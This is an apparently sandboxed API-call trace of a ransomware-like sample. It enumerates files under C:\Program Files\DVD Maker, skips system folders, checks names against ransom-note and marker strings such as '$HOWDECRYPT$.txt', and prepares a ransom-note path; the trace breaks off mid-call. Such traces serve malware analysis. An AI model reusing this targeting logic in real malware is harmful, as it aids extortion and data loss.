lstrcmpW (lpString1="DVD Maker", lpString2="..") returned 1 [0092.091] GetProcessHeap () returned 0x2c0000 [0092.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0092.092] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\*") returned 32 [0092.092] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x335ee0 [0092.093] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.093] lstrlenW (lpString="Windows") returned 7 [0092.093] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.093] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.093] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.093] lstrlenW (lpString="System Volume Information") returned 25 [0092.093] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\.") returned 32 [0092.093] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.093] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0092.093] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.093] lstrlenW (lpString="Windows") returned 7 [0092.093] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.094] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.094] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.094] lstrlenW (lpString="System Volume Information") returned 25 [0092.094] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\..") returned 33 [0092.094] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.094] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.094] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0092.094] lstrcmpiW (lpString1="audiodepthconverter.ax", lpString2="Windows") returned -1 [0092.094] lstrlenW (lpString="Windows") returned 7 [0092.094] lstrcmpiW (lpString1="audiodepthconverter.ax", lpString2="$Recycle.bin") returned 1 [0092.094] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.094] lstrcmpiW (lpString1="audiodepthconverter.ax", lpString2="System Volume Information") returned -1 [0092.094] lstrlenW (lpString="System Volume Information") returned 25 [0092.094] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax") returned 53 [0092.094] StrStrIW (lpFirst="audiodepthconverter.ax", lpSrch=".spyhunter") returned 0x0 [0092.094] lstrcmpW (lpString1="audiodepthconverter.ax", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.094] lstrcmpW (lpString1="audiodepthconverter.ax", lpString2="_uninstalling_.png") returned 1 [0092.094] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\audiodepthconverter.ax") returned 53 [0092.094] GetProcessHeap () returned 0x2c0000 [0092.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xac) returned 0x329e90 [0092.094] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1618) returned 0x2c310e0 [0092.094] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0092.094] lstrcmpiW (lpString1="bod_r.TTF", lpString2="Windows") returned -1 [0092.095] lstrlenW (lpString="Windows") returned 7 [0092.095] lstrcmpiW (lpString1="bod_r.TTF", lpString2="$Recycle.bin") returned 1 [0092.095] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.095] lstrcmpiW (lpString1="bod_r.TTF", lpString2="System Volume Information") returned -1 [0092.095] lstrlenW (lpString="System Volume Information") returned 25 [0092.095] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF") returned 40 [0092.095] StrStrIW (lpFirst="bod_r.TTF", lpSrch=".spyhunter") returned 0x0 [0092.095] lstrcmpW (lpString1="bod_r.TTF", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.095] lstrcmpW (lpString1="bod_r.TTF", lpString2="_uninstalling_.png") returned 1 [0092.095] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\bod_r.TTF") returned 40 [0092.095] GetProcessHeap () returned 0x2c0000 [0092.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x92) returned 0x351188 [0092.095] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1620) returned 0x2c310e0 [0092.095] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0092.095] lstrcmpiW (lpString1="directshowtap.ax", lpString2="Windows") returned -1 [0092.095] lstrlenW (lpString="Windows") returned 7 [0092.095] lstrcmpiW (lpString1="directshowtap.ax", lpString2="$Recycle.bin") returned 1 [0092.095] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.095] lstrcmpiW (lpString1="directshowtap.ax", lpString2="System Volume Information") returned -1 [0092.095] lstrlenW (lpString="System Volume Information") returned 25 [0092.095] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax") returned 47 [0092.095] StrStrIW (lpFirst="directshowtap.ax", lpSrch=".spyhunter") returned 0x0 [0092.095] lstrcmpW (lpString1="directshowtap.ax", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.096] lstrcmpW (lpString1="directshowtap.ax", lpString2="_uninstalling_.png") returned 1 [0092.096] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax") returned 47 [0092.096] GetProcessHeap () returned 0x2c0000 [0092.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa0) returned 0x330de8 [0092.096] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1628) returned 0x2c310e0 [0092.096] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0092.096] lstrcmpiW (lpString1="DVDMaker.exe", lpString2="Windows") returned -1 [0092.096] lstrlenW (lpString="Windows") returned 7 [0092.096] lstrcmpiW (lpString1="DVDMaker.exe", lpString2="$Recycle.bin") returned 1 [0092.096] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.096] lstrcmpiW (lpString1="DVDMaker.exe", lpString2="System Volume Information") returned -1 [0092.096] lstrlenW (lpString="System Volume Information") returned 25 [0092.096] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe") returned 43 [0092.096] StrStrIW (lpFirst="DVDMaker.exe", lpSrch=".spyhunter") returned 0x0 [0092.096] lstrcmpW (lpString1="DVDMaker.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.096] lstrcmpW (lpString1="DVDMaker.exe", lpString2="_uninstalling_.png") returned 1 [0092.096] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe") returned 43 [0092.096] GetProcessHeap () returned 0x2c0000 [0092.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x98) returned 0x3510e8 [0092.096] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1630) returned 0x2c310e0 [0092.096] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0092.096] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0092.096] lstrlenW (lpString="Windows") returned 7 [0092.097] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0092.097] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.097] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0092.097] lstrlenW (lpString="System Volume Information") returned 25 [0092.097] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US") returned 36 [0092.097] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0092.097] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0092.097] GetProcessHeap () returned 0x2c0000 [0092.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0092.097] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*") returned 38 [0092.097] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335f20 [0092.098] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.098] lstrlenW (lpString="Windows") returned 7 [0092.098] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.098] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.098] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.098] lstrlenW (lpString="System Volume Information") returned 25 [0092.098] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\.") returned 38 [0092.098] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.098] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0092.098] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.098] lstrlenW (lpString="Windows") returned 7 [0092.098] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.098] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.098] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.098] lstrlenW (lpString="System Volume Information") returned 25 [0092.099] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\..") returned 39 [0092.099] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.099] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.099] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0092.099] lstrcmpiW (lpString1="DVDMaker.exe.mui", lpString2="Windows") returned -1 [0092.099] lstrlenW (lpString="Windows") returned 7 [0092.099] lstrcmpiW (lpString1="DVDMaker.exe.mui", lpString2="$Recycle.bin") returned 1 [0092.099] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.099] lstrcmpiW (lpString1="DVDMaker.exe.mui", lpString2="System Volume Information") returned -1 [0092.099] lstrlenW (lpString="System Volume Information") returned 25 [0092.099] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui") returned 53 [0092.099] StrStrIW (lpFirst="DVDMaker.exe.mui", lpSrch=".spyhunter") returned 0x0 [0092.099] lstrcmpW (lpString1="DVDMaker.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.099] lstrcmpW (lpString1="DVDMaker.exe.mui", lpString2="_uninstalling_.png") returned 1 [0092.099] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui") returned 53 [0092.099] GetProcessHeap () returned 0x2c0000 [0092.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xac) returned 0x32a000 [0092.099] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1638) returned 0x2c310e0 [0092.099] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0092.100] lstrcmpiW (lpString1="OmdProject.dll.mui", lpString2="Windows") returned -1 [0092.100] lstrlenW (lpString="Windows") returned 7 [0092.100] lstrcmpiW (lpString1="OmdProject.dll.mui", lpString2="$Recycle.bin") returned 1 [0092.100] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.100] lstrcmpiW (lpString1="OmdProject.dll.mui", lpString2="System Volume Information") returned -1 [0092.100] lstrlenW (lpString="System Volume Information") returned 25 [0092.100] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui") returned 55 [0092.100] StrStrIW (lpFirst="OmdProject.dll.mui", lpSrch=".spyhunter") returned 0x0 [0092.100] lstrcmpW (lpString1="OmdProject.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.100] lstrcmpW (lpString1="OmdProject.dll.mui", lpString2="_uninstalling_.png") returned 1 [0092.100] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui") returned 55 [0092.100] GetProcessHeap () returned 0x2c0000 [0092.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb0) returned 0x32a0b8 [0092.101] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1640) returned 0x2c310e0 [0092.101] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0092.101] lstrcmpiW (lpString1="WMM2CLIP.dll.mui", lpString2="Windows") returned 1 [0092.101] lstrlenW (lpString="Windows") returned 7 [0092.101] lstrcmpiW (lpString1="WMM2CLIP.dll.mui", lpString2="$Recycle.bin") returned 1 [0092.101] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.101] lstrcmpiW (lpString1="WMM2CLIP.dll.mui", lpString2="System Volume Information") returned 1 [0092.101] lstrlenW (lpString="System Volume Information") returned 25 [0092.101] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui") returned 53 [0092.101] StrStrIW (lpFirst="WMM2CLIP.dll.mui", lpSrch=".spyhunter") returned 0x0 [0092.101] lstrcmpW (lpString1="WMM2CLIP.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.101] lstrcmpW (lpString1="WMM2CLIP.dll.mui", lpString2="_uninstalling_.png") returned 1 [0092.101] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui") returned 53 [0092.101] GetProcessHeap () returned 0x2c0000 [0092.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xac) returned 0x32a170 [0092.101] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1648) returned 0x2c310e0 [0092.101] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0092.101] FindClose (in: hFindFile=0x335f20 | out: hFindFile=0x335f20) returned 1 [0092.102] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\$HOWDECRYPT$.txt") returned 53 [0092.102] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\$HOWDECRYPT$.txt") returned 53 [0092.102] GetProcessHeap () returned 0x2c0000 [0092.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xac) returned 0x32a228 [0092.102] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1650) returned 0x2c310e0 [0092.102] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0092.102] lstrcmpiW (lpString1="Eurosti.TTF", lpString2="Windows") returned -1 [0092.102] lstrlenW (lpString="Windows") returned 7 [0092.102] lstrcmpiW (lpString1="Eurosti.TTF", lpString2="$Recycle.bin") returned 1 [0092.102] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.102] lstrcmpiW (lpString1="Eurosti.TTF", lpString2="System Volume Information") returned -1 [0092.102] lstrlenW (lpString="System Volume Information") returned 25 [0092.102] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF") returned 42 [0092.102] StrStrIW (lpFirst="Eurosti.TTF", lpSrch=".spyhunter") returned 0x0 [0092.102] lstrcmpW (lpString1="Eurosti.TTF", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.102] lstrcmpW (lpString1="Eurosti.TTF", lpString2="_uninstalling_.png") returned 1 [0092.102] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF") returned 42 [0092.102] GetProcessHeap () returned 0x2c0000 [0092.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x96) returned 0x351048 [0092.102] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1658) returned 0x2c310e0 [0092.102] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0092.103] lstrcmpiW (lpString1="fieldswitch.ax", lpString2="Windows") returned -1 [0092.103] lstrlenW (lpString="Windows") returned 7 [0092.103] lstrcmpiW (lpString1="fieldswitch.ax", lpString2="$Recycle.bin") returned 1 [0092.103] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.103] lstrcmpiW (lpString1="fieldswitch.ax", lpString2="System Volume Information") returned -1 [0092.103] lstrlenW (lpString="System Volume Information") returned 25 [0092.103] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax") returned 45 [0092.103] StrStrIW (lpFirst="fieldswitch.ax", lpSrch=".spyhunter") returned 0x0 [0092.103] lstrcmpW (lpString1="fieldswitch.ax", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.103] lstrcmpW (lpString1="fieldswitch.ax", lpString2="_uninstalling_.png") returned 1 [0092.103] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax") returned 45 [0092.103] GetProcessHeap () returned 0x2c0000 [0092.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x9c) returned 0x330d40 [0092.103] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1660) returned 0x2c310e0 [0092.103] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0092.103] lstrcmpiW (lpString1="offset.ax", lpString2="Windows") returned -1 [0092.103] lstrlenW (lpString="Windows") returned 7 [0092.103] lstrcmpiW (lpString1="offset.ax", lpString2="$Recycle.bin") returned 1 [0092.104] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.104] lstrcmpiW (lpString1="offset.ax", lpString2="System Volume Information") returned -1 [0092.104] lstrlenW (lpString="System Volume Information") returned 25 [0092.104] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax") returned 40 [0092.104] StrStrIW (lpFirst="offset.ax", lpSrch=".spyhunter") returned 0x0 [0092.104] lstrcmpW (lpString1="offset.ax", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.104] lstrcmpW (lpString1="offset.ax", lpString2="_uninstalling_.png") returned 1 [0092.104] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax") returned 40 [0092.104] GetProcessHeap () returned 0x2c0000 [0092.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x92) returned 0x351228 [0092.104] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1668) returned 0x2c310e0 [0092.104] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0092.104] lstrcmpiW (lpString1="OmdBase.dll", lpString2="Windows") returned -1 [0092.104] lstrlenW (lpString="Windows") returned 7 [0092.104] lstrcmpiW (lpString1="OmdBase.dll", lpString2="$Recycle.bin") returned 1 [0092.104] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.104] lstrcmpiW (lpString1="OmdBase.dll", lpString2="System Volume Information") returned -1 [0092.105] lstrlenW (lpString="System Volume Information") returned 25 [0092.105] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll") returned 42 [0092.105] StrStrIW (lpFirst="OmdBase.dll", lpSrch=".spyhunter") returned 0x0 [0092.105] lstrcmpW (lpString1="OmdBase.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.105] lstrcmpW (lpString1="OmdBase.dll", lpString2="_uninstalling_.png") returned 1 [0092.105] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll") returned 42 [0092.105] GetProcessHeap () returned 0x2c0000 [0092.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x96) returned 0x3512c8 [0092.105] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1670) returned 0x2c310e0 [0092.105] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0092.105] lstrcmpiW (lpString1="OmdProject.dll", lpString2="Windows") returned -1 [0092.105] lstrlenW (lpString="Windows") returned 7 [0092.105] lstrcmpiW (lpString1="OmdProject.dll", lpString2="$Recycle.bin") returned 1 [0092.105] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.105] lstrcmpiW (lpString1="OmdProject.dll", lpString2="System Volume Information") returned -1 [0092.105] lstrlenW (lpString="System Volume Information") returned 25 [0092.105] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll") returned 45 [0092.105] StrStrIW (lpFirst="OmdProject.dll", lpSrch=".spyhunter") returned 0x0 [0092.105] lstrcmpW (lpString1="OmdProject.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.105] lstrcmpW (lpString1="OmdProject.dll", lpString2="_uninstalling_.png") returned 1 [0092.105] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll") returned 45 [0092.105] GetProcessHeap () returned 0x2c0000 [0092.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x9c) returned 0x330e90 [0092.105] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1678) returned 0x2c310e0 [0092.106] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0092.106] lstrcmpiW (lpString1="Pipeline.dll", lpString2="Windows") returned -1 [0092.106] lstrlenW (lpString="Windows") returned 7 [0092.106] lstrcmpiW (lpString1="Pipeline.dll", lpString2="$Recycle.bin") returned 1 [0092.106] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.106] lstrcmpiW (lpString1="Pipeline.dll", lpString2="System Volume Information") returned -1 [0092.106] lstrlenW (lpString="System Volume Information") returned 25 [0092.106] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll") returned 43 [0092.106] StrStrIW (lpFirst="Pipeline.dll", lpSrch=".spyhunter") returned 0x0 [0092.106] lstrcmpW (lpString1="Pipeline.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.106] lstrcmpW (lpString1="Pipeline.dll", lpString2="_uninstalling_.png") returned 1 [0092.106] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll") returned 43 [0092.106] GetProcessHeap () returned 0x2c0000 [0092.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x98) returned 0x351368 [0092.106] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1680) returned 0x2c310e0 [0092.106] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0092.106] lstrcmpiW (lpString1="PipeTran.dll", lpString2="Windows") returned -1 [0092.106] lstrlenW (lpString="Windows") returned 7 [0092.106] lstrcmpiW (lpString1="PipeTran.dll", lpString2="$Recycle.bin") returned 1 [0092.106] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.106] lstrcmpiW (lpString1="PipeTran.dll", lpString2="System Volume Information") returned -1 [0092.106] lstrlenW (lpString="System Volume Information") returned 25 [0092.106] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll") returned 43 [0092.107] StrStrIW (lpFirst="PipeTran.dll", lpSrch=".spyhunter") returned 0x0 [0092.107] lstrcmpW (lpString1="PipeTran.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.107] lstrcmpW (lpString1="PipeTran.dll", lpString2="_uninstalling_.png") returned 1 [0092.107] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll") returned 43 [0092.107] GetProcessHeap () returned 0x2c0000 [0092.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x98) returned 0x351408 [0092.107] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1688) returned 0x2c310e0 [0092.107] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0092.107] lstrcmpiW (lpString1="rtstreamsink.ax", lpString2="Windows") returned -1 [0092.107] lstrlenW (lpString="Windows") returned 7 [0092.107] lstrcmpiW (lpString1="rtstreamsink.ax", lpString2="$Recycle.bin") returned 1 [0092.107] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.107] lstrcmpiW (lpString1="rtstreamsink.ax", lpString2="System Volume Information") returned -1 [0092.107] lstrlenW (lpString="System Volume Information") returned 25 [0092.107] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax") returned 46 [0092.107] StrStrIW (lpFirst="rtstreamsink.ax", lpSrch=".spyhunter") returned 0x0 [0092.107] lstrcmpW (lpString1="rtstreamsink.ax", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.107] lstrcmpW (lpString1="rtstreamsink.ax", lpString2="_uninstalling_.png") returned 1 [0092.107] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax") returned 46 [0092.107] GetProcessHeap () returned 0x2c0000 [0092.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x9e) returned 0x330f38 [0092.107] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1690) returned 0x2c310e0 [0092.107] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0092.108] lstrcmpiW (lpString1="rtstreamsource.ax", lpString2="Windows") returned -1 [0092.108] lstrlenW (lpString="Windows") returned 7 [0092.108] lstrcmpiW (lpString1="rtstreamsource.ax", lpString2="$Recycle.bin") returned 1 [0092.108] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.108] lstrcmpiW (lpString1="rtstreamsource.ax", lpString2="System Volume Information") returned -1 [0092.108] lstrlenW (lpString="System Volume Information") returned 25 [0092.108] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax") returned 48 [0092.108] StrStrIW (lpFirst="rtstreamsource.ax", lpSrch=".spyhunter") returned 0x0 [0092.108] lstrcmpW (lpString1="rtstreamsource.ax", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.108] lstrcmpW (lpString1="rtstreamsource.ax", lpString2="_uninstalling_.png") returned 1 [0092.108] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax") returned 48 [0092.108] GetProcessHeap () returned 0x2c0000 [0092.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xa2) returned 0x33d210 [0092.108] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1698) returned 0x2c310e0 [0092.108] FindNextFileW (in: hFindFile=0x335ee0, 